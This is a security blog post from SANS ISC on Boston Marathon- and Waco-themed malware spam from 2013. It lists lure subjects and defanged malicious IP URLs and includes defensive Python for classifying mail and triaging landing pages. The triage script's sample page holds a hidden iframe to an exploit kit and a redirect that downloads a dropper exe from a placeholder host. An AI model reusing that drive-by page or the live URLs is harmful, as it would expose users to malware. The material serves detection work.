
SANS ISC InfoSec Handlers Diary Blog



UPDATEDx1: Boston-Related Malware Campaigns Have Begun - Now with Waco Plant Explosion Fun

Published: 2013-04-17
Last Updated: 2013-04-18 15:12:32 UTC
by John Bambenek (Version: 1)
2 comment(s)

UPDATE: 04-18-2013 @ 10:10 AM CDT -

Some of the spam campaigns are now switching over to the Waco plant explosion. The lure is basically the same: a subject that mentions the video, followed by an IP-only URL ending in /texas.html or /news.html. The landing page has a few embedded YouTube videos and, at the end, an iframe with malicious content.

** End Update 1 **

About mid-afternoon yesterday (US Central time), Boston-related spam campaigns began. The general hook is a URL sent under a subject line about video of the explosions. When Osama bin Laden was killed, fake images were the hook; in this case the video is actually relevant to the story and is being used as the hook. Right now, very roughly 10-20% of all spam is related to this (some spamtraps report more, some less). The same IPs have also been sending pump & dump scams, so it is likely the same group has re-tasked itself.

Here is a list of subjects I've seen hit spam traps:

Subject: 2 Explosions at Boston Marathon
Subject: Aftermath to explosion at Boston Marathon
Subject: Arbitron. Dial Global. Boston Bombings
Subject: Boston Explosion Caught on Video
Subject: BREAKING - Boston Marathon Explosion
Subject: Explosion at Boston Marathon
Subject: Explosion at the Boston Marathon
Subject: Explosions at Boston Marathon
Subject: Explosions at the Boston Marathon
Subject: Opinion: Boston Marathon Explosions made by radical Gays? Really? - CNN.com
Subject: Opinion: Boston Marathon Explosions - Romney Benefits? - CNN.com
Subject: Opinion: Boston Marathon Worse Sensation - Osama bin Laden still alive!? - CNN.com
Subject: Opinion: FBI knew about bombs 3 days before Boston Marathon - Why and Who Benefits? - CNN.com
Subject: Opinion: Osama Bin Laden video about Boston Marathon Explosions - bad news for all the world. - CNN.com
Subject:[SPAM] 2 Explosions at Boston Marathon
Subject:[SPAM] Boston Explosion Caught on Video
Subject:[SPAM] Explosions at the Boston Marathon
Subject:[SPAM] Video of Explosion at the Boston Marathon 2013
Subject: Stiri:EXPLOZIILE de la maratonul din Boston/Spaga este negociata la granita Romaniei/A inventat bautura care INLOCUIESTE MANCAREA/TUNELUL cu mecanisme de NEINTELES al lui STALIN/70 % din infrastructura RCS-RDS este amplasata ILEGAL/BOMBA ANULUI IN SHOWBIZ (Romanian; in English: "News: THE EXPLOSIONS at the Boston marathon / Bribes are negotiated at Romania's border / He invented the drink that REPLACES FOOD / STALIN's TUNNEL with INCOMPREHENSIBLE mechanisms / 70% of RCS-RDS infrastructure is sited ILLEGALLY / THE BOMBSHELL OF THE YEAR IN SHOWBIZ")
Subject: Video of Explosion at the Boston Marathon 2013

Here is a list of malicious URLs in those messages (use at your own risk):

hxxp://109.87.205.222/boston.html
hxxp://109.87.205.222/news.html
hxxp://110.92.80.47/boston.html
hxxp://110.92.80.47/news.html
hxxp://118.141.37.122/boston.html
hxxp://118.141.37.122/news.html
hxxp://176.241.148.169/boston.html
hxxp://176.241.148.169/news.html
hxxp://178.137.100.12/boston.html
hxxp://178.137.100.12/news.html
hxxp://178.137.120.224/boston.html
hxxp://178.137.120.224/news.html
hxxp://188.2.164.112/boston.html
hxxp://188.2.164.112/news.html
hxxp://190.245.177.248/boston.html
hxxp://190.245.177.248/news.html
hxxp://212.75.18.190/boston.html
hxxp://212.75.18.190/news.html
hxxp://213.34.205.27/boston.html
hxxp://213.34.205.27/news.html
hxxp://217.145.222.14/boston.html
hxxp://217.145.222.14/news.html
hxxp://219.198.196.116/boston.html
hxxp://219.198.196.116/news.html
hxxp://24.180.60.184/boston.html
hxxp://24.180.60.184/news.html
hxxp://24.214.242.227/boston.html
hxxp://24.214.242.227/news.html
hxxp://31.133.84.65/boston.html
hxxp://31.133.84.65/news.html
hxxp://37.229.215.183/boston.html
hxxp://37.229.215.183/news.html
hxxp://37.229.92.116/boston.html
hxxp://37.229.92.116/news.html
hxxp://46.233.4.113/boston.html
hxxp://46.233.4.113/news.html
hxxp://46.233.4.113/xxxxx.html
hxxp://50.136.163.28/boston.html
hxxp://50.136.163.28/news.html
hxxp://61.63.123.44/boston.html
hxxp://61.63.123.44/news.html
hxxp://62.45.148.76/boston.html
hxxp://62.45.148.76/news.html
hxxp://62.45.148.76/xxxxx.html
hxxp://78.90.133.133/boston.html
hxxp://78.90.133.133/news.html
hxxp://83.170.192.154/boston.html
hxxp://83.170.192.154/news.html
hxxp://85.198.81.26/boston.html
hxxp://85.198.81.26/news.html
hxxp://85.204.15.40/boston.html
hxxp://85.204.15.40/news.html
hxxp://85.217.234.98/boston.html
hxxp://85.217.234.98/news.html
hxxp://91.241.177.162/boston.html
hxxp://91.241.177.162/news.html
hxxp://91.241.177.162/xxxxx.html
hxxp://94.153.15.249/boston.html
hxxp://94.153.15.249/news.html
hxxp://94.28.49.130/boston.html
hxxp://94.28.49.130/news.html
hxxp://95.69.141.121/boston.html
hxxp://95.69.141.121/news.html
hxxp://95.87.6.156/boston.html
hxxp://95.87.6.156/news.html
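The lure has a fixed shape: an event-themed subject plus a link whose host is a bare IP address and whose path is /boston.html, /news.html or (after the update) /texas.html. The script below is an added example written for this page, not code from the diary: it matches mail against that shape and extracts a host blocklist from an IOC list like the one above. The four sample messages and their addresses (TEST-NET ranges) are constructed; the real campaign mail is not on the page.

```python
"""Flag mail that fits the Boston/Waco lure: an event-themed subject plus
a link to an IP-only URL ending in /boston.html, /news.html or /texas.html.

Example code written for this page, not from the diary.  The sample
messages and their IP addresses (TEST-NET ranges) are constructed.
"""
import re
from email import message_from_string
from email.policy import default

# Landing-page paths seen in the diary, including the /texas.html variant
# from the Waco update.
CAMPAIGN_PATHS = {"/boston.html", "/news.html", "/texas.html"}

# Words that mark the subject as event-themed.  On their own they also match
# legitimate news mail, so the URL shape is required as well.
SUBJECT_TERMS = ("boston", "marathon", "explosion", "waco", "texas")

# http:// (or hxxp://, so a defanged IOC list can be fed in unchanged),
# a dotted-quad host with no port, and a one-segment .html path.
IP_URL_RE = re.compile(
    r"h(?:tt|xx)p://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?P<path>/[\w-]+\.html)",
    re.IGNORECASE,
)


def _valid_ipv4(ip):
    return all(0 <= int(octet) <= 255 for octet in ip.split("."))


def campaign_urls(text):
    """Return [(ip, path), ...] for every IP-literal campaign URL in text."""
    hits = []
    for m in IP_URL_RE.finditer(text):
        ip, path = m.group("ip"), m.group("path").lower()
        if _valid_ipv4(ip) and path in CAMPAIGN_PATHS:
            hits.append((ip, path))
    return hits


def blocklist(ioc_text):
    """Sorted unique hosts from an IOC list such as the diary's hxxp:// URLs.

    Every host in such a list is known-bad, so the path is ignored here."""
    return sorted({m.group("ip") for m in IP_URL_RE.finditer(ioc_text)
                   if _valid_ipv4(m.group("ip"))})


def _body_text(msg):
    """Concatenate the decoded text/plain and text/html parts of a message."""
    return "\n".join(part.get_content() for part in msg.walk()
                     if part.get_content_type() in ("text/plain", "text/html"))


def classify_message(raw):
    """Parse one RFC 822 message and report whether it matches the lure.

    Both conditions must hold: an event-themed subject AND a link to an
    IP-only campaign path.  A news digest with a matching subject but
    ordinary links is not flagged."""
    msg = message_from_string(raw, policy=default)
    subject = str(msg["Subject"] or "")
    subject_hit = any(term in subject.lower() for term in SUBJECT_TERMS)
    urls = campaign_urls(_body_text(msg))
    return {"subject": subject, "subject_hit": subject_hit,
            "urls": urls, "campaign": subject_hit and bool(urls)}


# Constructed samples: two lures (Boston and the Waco variant), a plausible
# news digest with a matching subject, and unrelated mail with an IP URL.
LURE = """From: news@example.net
To: user@example.org
Subject: Boston Explosion Caught on Video

Video of the explosions: http://203.0.113.7/boston.html
"""
WACO = """From: news@example.net
To: user@example.org
Subject: Video of the Waco plant explosion

http://198.51.100.23/texas.html
"""
DIGEST = """From: alerts@example.com
To: user@example.org
Subject: Explosions at the Boston Marathon

Full story: http://www.example.com/2013/04/15/boston-marathon/index.html
"""
OTHER = """From: friend@example.org
To: user@example.org
Subject: lunch

My router's admin page is http://192.0.2.1/index.html
"""

if __name__ == "__main__":
    for raw in (LURE, WACO, DIGEST, OTHER):
        r = classify_message(raw)
        print("CAMPAIGN" if r["campaign"] else "ok      ", repr(r["subject"]), r["urls"])
```

Requiring both the subject and the URL shape is what keeps a real news digest out of the quarantine; the subject list above is far too generic to act on by itself. The blocklist helper deliberately ignores the path so that hosts serving the redacted xxxxx.html variant are still caught.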
 
Some of these are already down; the ones still up are basically plain pages with a handful of relevant embedded YouTube videos. Early versions redirected to fetch a file named boston___________AVI.exe, and down the rabbit hole it goes. It was pretty loud, so most AV should have signatures already.
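For a saved copy of one of these landing pages, the triage that matters is separating the YouTube embeds from whatever else the page loads: the trailing iframe and any redirect to the dropper. The parser below is an added example, not code from the diary. Its sample page is constructed from the diary's description (three video embeds, a hidden iframe at the end, and a redirect to a file named boston___________AVI.exe); the diary does not say how the redirect was performed, so the JavaScript location assignment and the /kit/index.php path are assumptions made for the sample.

```python
"""Triage a saved copy of a campaign landing page: separate the YouTube
embeds from the trailing iframe and any redirect to the dropper.

Example code written for this page, not from the diary.  SAMPLE is a
constructed page built from the diary's description; the JavaScript
redirect and the /kit/index.php path are assumptions for the sample.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

VIDEO_HOSTS = {"www.youtube.com", "youtube.com", "www.youtube-nocookie.com"}

# File name the diary says early versions fetched.
DROPPER_NAME = "boston___________AVI.exe"
DROPPER_RE = re.compile(r"boston_+AVI\.exe", re.IGNORECASE)

# Plain JavaScript redirects: location = "...", location.href = "...",
# window.location = "...".  Obfuscated scripts need a real JS engine.
JS_REDIRECT_RE = re.compile(
    r"(?:window\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")


class LandingPageParser(HTMLParser):
    """Collect iframes, meta refreshes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes, self.refreshes, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append({"src": a.get("src", ""), "width": a.get("width", ""),
                                 "height": a.get("height", ""), "style": a.get("style", "")})
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.IGNORECASE)
            if m:
                self.refreshes.append(m.group(1))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.scripts.append(data)


def _is_hidden(frame):
    """1x1/0x0 or display:none frames are the classic drive-by iframe shape."""
    def px(value):
        try:
            return int(value.lower().rstrip("px"))
        except ValueError:
            return None
    w, h = px(frame["width"]), px(frame["height"])
    tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
    style = frame["style"].replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def triage(html):
    """Return the video embeds, the suspect iframes, and any redirect URLs."""
    p = LandingPageParser()
    p.feed(html)
    p.close()
    videos, suspects = [], []
    for f in p.iframes:
        if (urlparse(f["src"]).hostname or "").lower() in VIDEO_HOSTS:
            videos.append(f["src"])
        else:
            suspects.append({**f, "hidden": _is_hidden(f)})
    redirects = list(p.refreshes)
    for body in p.scripts:
        redirects.extend(JS_REDIRECT_RE.findall(body))
    return {"videos": videos, "suspect_iframes": suspects, "redirects": redirects,
            "dropper_urls": [u for u in redirects if DROPPER_RE.search(u)]}


# Constructed sample modelled on the diary's description of the landing page.
SAMPLE = """<html><head><title>Boston Marathon Explosion</title></head><body>
<h1>Video of Explosion at the Boston Marathon 2013</h1>
<iframe width="560" height="315" src="http://www.youtube.com/embed/EXAMPLE01" frameborder="0"></iframe>
<iframe width="560" height="315" src="http://www.youtube.com/embed/EXAMPLE02" frameborder="0"></iframe>
<iframe width="560" height="315" src="http://www.youtube.com/embed/EXAMPLE03" frameborder="0"></iframe>
<iframe src="http://203.0.113.7/kit/index.php" width="1" height="1" style="display:none"></iframe>
<script>setTimeout(function(){ window.location = "http://203.0.113.7/%s"; }, 3000);</script>
</body></html>""" % DROPPER_NAME

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("video embeds:   ", result["videos"])
    print("suspect iframes:", result["suspect_iframes"])
    print("redirects:      ", result["redirects"])
    print("dropper URLs:   ", result["dropper_urls"])
```

Run it against a page saved from a lab machine rather than fetching the URL yourself; the point of the split is that anything which is not a known video host is the thing to look at, and a 1x1 or display:none frame at the end of an otherwise benign-looking page is the usual place the exploit kit is loaded from.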
 
H/T to Nick Tabick and Corbin Souffrant, two of my students at the University of Illinois who helped dig into this last night.
 

--
John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Consulting
